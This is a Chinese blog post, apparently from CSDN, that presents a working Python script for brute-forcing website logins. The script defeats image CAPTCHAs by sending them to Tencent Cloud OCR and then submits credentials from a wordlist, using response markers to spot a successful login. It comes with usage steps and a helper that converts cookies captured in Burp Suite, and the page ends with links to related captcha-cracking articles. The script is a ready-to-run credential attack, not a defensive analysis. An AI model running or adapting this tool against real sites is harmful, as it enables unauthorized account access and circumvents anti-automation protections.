Python利用腾讯OCR识别验证码进行爆破

最新推荐文章于 2024-09-09 17:18:09 发布
最新推荐文章于 2024-09-09 17:18:09 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: 工具 学习 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43820662/article/details/108583700
版权

前言

现在基本上是个站就有验证码系统来防止爆破攻击(或者防爬虫?)。而当验证码没法重放和绕过的时候,想要使用burpsuite的intrude模块来爆破就不太现实。这时想到可以通过图片识别验证码来进行爆破啊。
于是写了个利用tesserocr识别验证码爆破的脚本。
结果tesserocr识别库识别率太可惜了(暂时不会训练,老菜逼了)。因此选择现成的ocr来识别验证码。最终选定的是腾讯的orc。ps:识别率可以,就是免费次数有点少。
PS:测试用,没写线程,爆破速度一般。!!腾讯ocr免费只有1000次!!

一、爆破脚本

代码如下(示例):

import base64
import re
import requests
from tencentcloud.common import credential
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException 
from tencentcloud.ocr.v20181119 import ocr_client, models 

def GetImg(URL,cookie_dict):#请求获取验证码
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"}
    img=requests.get(url=URL,headers=headers,cookies=cookie_dict)
    base64_data= base64.encodebytes(img.content)
    base64_data= 'data:image/png;base64,%s' % base64_data.decode()
    patten=re.compile('\s')
    return patten.sub('',base64_data)
    
    
def API(img_base64):#调用腾讯ORC API 获取识别结果
    try: 
        
        cred = credential.Credential("AKIxxxxxxxxxxxWJsCxF2b", "azDnvxxxxxxv73jbNQG") 
        #自己改API认证
        httpProfile = HttpProfile()
        httpProfile.endpoint = "ocr.tencentcloudapi.com"

        clientProfile = ClientProfile()
        clientProfile.httpProfile = httpProfile
        client = ocr_client.OcrClient(cred, "ap-beijing", clientProfile) 

        req = models.GeneralBasicOCRRequest()
        params = '{\"ImageBase64\":\"{'+img_base64+'}\"}'
        req.from_json_string(params)

        resp = client.GeneralBasicOCR(req) 
        return resp.to_json_string()

    except TencentCloudSDKException as err: 
        pass
        
def reCode(response):#正则匹配api中返回的code
    patten=re.compile('DetectedText\": \S{3,}\"')
    response=patten.search(response).group()
    return response[16:-1]


def TrueCode(URL,cookie_dict):#获取能识别的验证码
    img_base64=GetImg(URL,cookie_dict)
    response=API(img_base64)
    try:
        result=reCode(response)
        return result
    except:#若没找到验证码则输出false
        return 'false'

def Login(URL,success_str,code_error,data_para,cookie_dict):#使用识别到的code(不一定正确)去尝试登录(因为可能图片无法识别等)
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"}
    
    r=requests.post(url=URL,headers=headers,data=data_para,cookies=cookie_dict)#请求方式可能要改
    print(r.text)
    if success_str in r.text:#成功登录
        return 'success'
    elif code_error in r.text:#验证码错误
        return 'code_error'
    else:#账号或者密码错误
        return 0

def intrude(login_url,success_str,code_error,target,cookie_dict):#最后一层了,不套了不套了
    code=TrueCode(code_url,cookie_dict)
    while(code=='false'):
        code=TrueCode(code_url,cookie_dict)
        
        
    data_para={
        "uname":target,#用户名或者密码
        "password":"b59c67bf196a4758191e42f76670ceba",
        "vcode":code,#code的键
        "login":"1"
    }#提交参数

    status=Login(login_url,success_str,code_error,data_para,cookie_dict)
    if(status=="success"):
        print(target)
        return 'login_success'
    elif(status=='code_error'):
        return 'code_error'
    
    
    
    
    
if __name__ == '__main__':
    #只能操作一些简单的验证码,同时要求验证码错误和账号密码错误回显不同才行
    #需要修改以下有注释的参数
    #同时还有intrude函数里面的data_para参数,有时还需要自己改http头
    #还有Login函数里面的请求方式也要根据具体情况改
    #把腾讯ocr的API改成自己的,上腾讯云自己申请,一天1000次免费,超过收钱!!注意了!!
    #使用前需要安装腾讯SDK组件 pip install tencentcloud-sdk-python -i https://mirrors.tencent.com/pypi/simple/ --upgrade tencentcloud-sdk-python
    
    
    code_url=r'http://xxx/xxx'#获取验证码的url
    login_url=r'http://td.xxxx.cn/user/login'#登录URL
    success_str='1113'#登录成功标志字符,其实就是看响应体,比如这里用户名存在则响应体中有1113字符
    code_error='7777'#验证码错误的标志,其实就是看响应体,比如这里验证码错误响应体有7777字符
    cookie_dict={'UM_distinctid':'17486b76731166-05fxxxxf754-xxxxf-1fa400-17486b76732533','PHPSESSID':'mklsgxxxxf2uf689fao55'}#附带的生成脚本,在bp中抓包,复制cookie的值到cookie.txt中,运行cookie_dict_genrel.py
    fp=open('target.txt','r')#字典路径
    for i in range(0,5):#爆破次数
    
        target=fp.readline()
        patten=re.compile('\s')
        target=patten.sub('',target)
        result=intrude(login_url,success_str,code_error,target,cookie_dict)
        if(result=="login_success"):
            exit()
        while(result=="code_error"):#此处不用改,当验证码出错时,不换密码重新操作一次
            result=intrude(login_url,success_str,code_error,target,cookie_dict)

二、使用步骤

1.安装模块

pip install requests
pip install tencentcloud-sdk-python -i https://mirrors.tencent.com/pypi/simple/ --upgrade tencentcloud-sdk-python #安装腾讯SDK

2.具体使用

1.具体使用流程见上面脚本代码注释部分
2.这里贴上生成cookie的脚本,只需从burpsuite上复制cookie,在下面的脚本同目录下新建一个cookie.txt然后粘贴进去,运行即可获得字典格式的cookie,然后复制到爆破脚本的cookie参数里
3.运行起飞

cookie_dict_general.py

import re
fp = open("cookie.txt", "r")
cookie_list = fp.readlines()
for cookie in cookie_list:
    cookie = re.compile('\s').sub('', cookie)

    # 将字符串的cookie处理成字典
    patten = re.compile(";")
    cookie = patten.split(cookie)

    cookie_dict = {}
    for i in range(len(cookie)):
        cookie_dict[cookie[i].split('=')[0]] = cookie[i].split('=')[1]
    print(cookie_dict)

总结

因为只有1000次免费的机会,使用的时候注意点,免得把钱扣光。毕竟老菜逼了,不会训练tesserocr的识别库只能用用腾讯的ocr才能混日子(别骂了别骂了)。等以后有空再学习怎么训练吧。

如月专注
关注
专栏目录
python3爬虫系列23之selenium+腾讯OCR识别验证码登录微博且抓取数据
空空说技术的博客
12-02 3792
python3爬虫系列23之selenium+腾讯OCR识别验证码登录微博且抓取数据 1.前言 上一篇是一个 python3爬虫系列22之selenium模拟登录需要验证码的微博且抓取数据, 我们是首先进入到验证码网页读取验证码,人来手动识别输入,然后再提交。 比较麻烦。 翻看博客发现,之前有些过关于调用OCR的: python3调用腾讯API(图像/文字/验证码/名片/驾驶证)识别, 网上一大堆...
python高级—— 从趟过的坑中聊聊爬虫、反爬、反反爬,附送一套高级爬虫试题
09-30 6772
前言: 时隔数月,我终于又更新博客了,然而,在这期间的粉丝数也就跟着我停更博客而涨停了,唉 是的,我改了博客名,不知道为什么要改,就感觉现在这个名字看起来要洋气一点。 那么最近到底咋不更新博客了呢?说起原因那就多了,最主要的还是没时间了,是真的没时间,前面的那些系列博客都还没填坑完毕的(后续都会填上的) 最近有点空余就一直在开发我的项目,最近做了两个项目: IPproxy,看名字就知道啦...
python腾讯文字识别 OCR脚本
10-26
文字识别(Optical Character Recognition,OCR ),基于腾讯优图实验室世界领先的深度学习技术,将图片上的文字内容,智能识别成为可编辑的文本。
Python 腾讯OCR
编码行者的博客
09-02 561
import base64 import hashlib import time import uuid from urllib import parse import requests APP_ID = "2115424313131" APP_KEY = "IB1oUQtVFWF91YZ" OCR = 'https://api.ai.qq.com/fcgi-bin/ocr/ocr_gener...
验证码识别之点选验证码识别——绪论
最新发布
swpucwf的博客
09-09 1308
随着互联网的飞速发展,网络安全问题日益凸显,验证码作为一种有效的安全防护手段,广泛应用于登录验证、注册验证、防止自动化攻击等多个场景。传统的验证码形式如文本验证码、图形验证码等,虽在一定程度上提高了安全性,但也存在用户体验不佳、易被OCR(光学字符识别)技术破解等问题。近年来,点选验证验证码(又称为“点击验证”、“滑动验证”等)因其更高的安全性和良好的用户体验,逐渐成为验证码领域的新宠。本文将探讨如何利用深度学习技术实现点选验证验证码识别,以期为相关领域的研究与应用提供参考。
Python调用腾讯OCR实现文字识别+写入Excel(附代码)
weixin_42636075的博客
12-31 1613
python配置腾讯OCR识别
python 调用腾讯ocr
weixin_42592399的博客
02-13 107
腾讯云提供了OCR(Optical Character Recognition,光学字符识别)的API,可以使用Python调用。使用前,需要到腾讯云控制台申请API密钥,然后通过代码实现图片文字识别。 实现步骤如下: 安装腾讯云SDK:使用pip安装"tencentcloud-sdk-python" 导入需要的库:import tencentcloud.ocr.v20181119.models...
python调用腾讯ocr的代码
weixin_41733475的博客
10-15 199
以下代码示例仅供参考,建议采用更安全的方式来使用密钥,请参见:https://cloud.tencent.com/document/product/1278/85305。# 实例化一个认证对象,入参需要传入腾讯云账户 SecretId 和 SecretKey,此处还需注意密钥对的保密。# 返回的resp是一个GeneralBasicOCRResponse的实例,与请求对象对应。# 实例化一个client选项,可选的,没有特殊需求可以跳过。# 实例化一个http选项,可选的,没有特殊需求可以跳过。
Python 腾讯OCR识别
GYBIN02的专栏
10-18 455
网上找了下PythonOCR识别的,如果是用本地识别,通常用 tesseract,但是好像识别率不高,wa示例不多,用Python的还是Python2.7,花了点时间改成Python3的。
Python3实现腾讯OCR识别
12-25
废话不多说,在网上找了下腾讯OCR识别的,示例不多,用Python的还是Python2.7,花了点时间改成Python3的。 先上图,腾讯自己的示例图: 下面是代码: import requests import hmac import hashlib import base64 import time import random import re appid = "你自己的appid" bucket = " 这个是优图上面的,可以不填" #参考本文开头提供的链接 secret_id = "填自己的" #参考官方文档 secret_key = "填自己的" #同上 expired
python3 ocr_Python3实现腾讯OCR识别
weixin_39965514的博客
12-05 121
废话不多说,在网上找了下腾讯OCR识别的,示例不多,用Python的还是Python2.7,花了点时间改成Python3的。先上图,腾讯自己的示例图:下面是代码:import requestsimport hmacimport hashlibimport base64import timeimport randomimport reappid = "你自己的appid"bucket = " 这个...
Python3使用腾讯云文字识别(腾讯OCR)提取图片中的文字内容实例详解
09-17
主要介绍了Python3使用腾讯云文字识别(腾讯OCR)提取图片中的文字内容方法详解,需要的朋友可以参考下
tencentcloud-sdk-python:适用于Python腾讯云API 3.0 SDK
03-15
简介 欢迎使用腾讯云开发者工具套件(SDK)3.0,SDK3.0是云API3.0平台的配套工具。目前已经支持cvm,vpc,cbs等产品,后续所有的云服务产品都会接纳进来。新版SDK实现了统一化,具有多种语言版本的SDK使用方法相同,接口调用方式相同,统一的错误码和返回包格式这些优点。于Python腾讯云开发工具包,并提供首次使用开发工具包的简单示例。让您快速获取腾讯Python SDK并开始调用。 依赖环境 依赖环境:Python 2.7,3.6-3.9版本。 从腾讯云控制台开通相应产品。 获取SecretID,SecretKey以及调用地址(端点),端点一般形式为* .tencentcloudapi.com,如CVM的调用地址为cvm.tencentcloudapi.com,具体参考各产品说明。 获取安装 安装Python SDK前,先获取安全凭证。在第一次使用云API之前,用户首
python】使用腾讯云的OCR 文字识别记录(附代码)
weixin_44002043的博客
02-19 971
不过,这个对于我的需求来说才是完成了长征的第一步,后面我得解析这里的resp的具体数据,而且还得保证它的数据得是我想要的时间文本,要不数据无用。这已经是后面的需求了。还在迈出了第一步。
python调用腾讯云接口,实现财务发票混贴模式下,批量识别并转存excel表格的功能
weixin_67138092的博客
07-06 1626
【代码】python调用腾讯云接口,实现财务发票混贴模式下,批量识别并转存excel表格的功能。
自建ocr接口动态识别验证码 配bp进行验证码爆破
逍遥小哥的博客
04-21 3898
然后到切换到captcha-killer插件面板,点击获取即可拿到要识别验证码图片内容(下方验证码url栏处,直接点击获取验证码也行,无需复制验证码url,再点击获取)备注: 1.本来想爆破pikachu的 但是pikachu的验证码不好识别(10个里面能错4个,不管是收费还是免费的ocr接口)2.爆破图形验证码,得看看验证码好不好识别,然后再去爆破。# 修改entrypoint.sh中的参数,具体参数往上翻,默认9898端口,同时开启ocr模块以及目标检测模块。这时抓包登录界面的请求包,
神经网络实现腾讯QQ验证码识别DLL(准确率达91%)
ywb5156的博客
04-01 1219
神经网络实现腾讯QQ验证码识别DLL(准确率达91%)易语言开发的验证码识别的dll,可供各种程序调用,C# C++ ,aspx ,delphi ,等调用。识别率91%,根据样板库,模型训练出来的。RMB出售。有兴趣请企鹅:578819777.腾讯验证码,http://captcha.qq.com/getimage, 易语言开发的验证码识别的dll,可供各种程序调用,C# C++ ,aspx ,d...
Python图像处理:利用Tesseract进行OCR文字识别
"这篇文章主要介绍了Python如何利用Tesseract库进行图像文字识别OCR)的教程。Tesseract是一个由Google赞助的开源OCR系统,以其高精确度和灵活性著称,能够识别各种字体和Unicode字符。文章提供了Tesseract在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值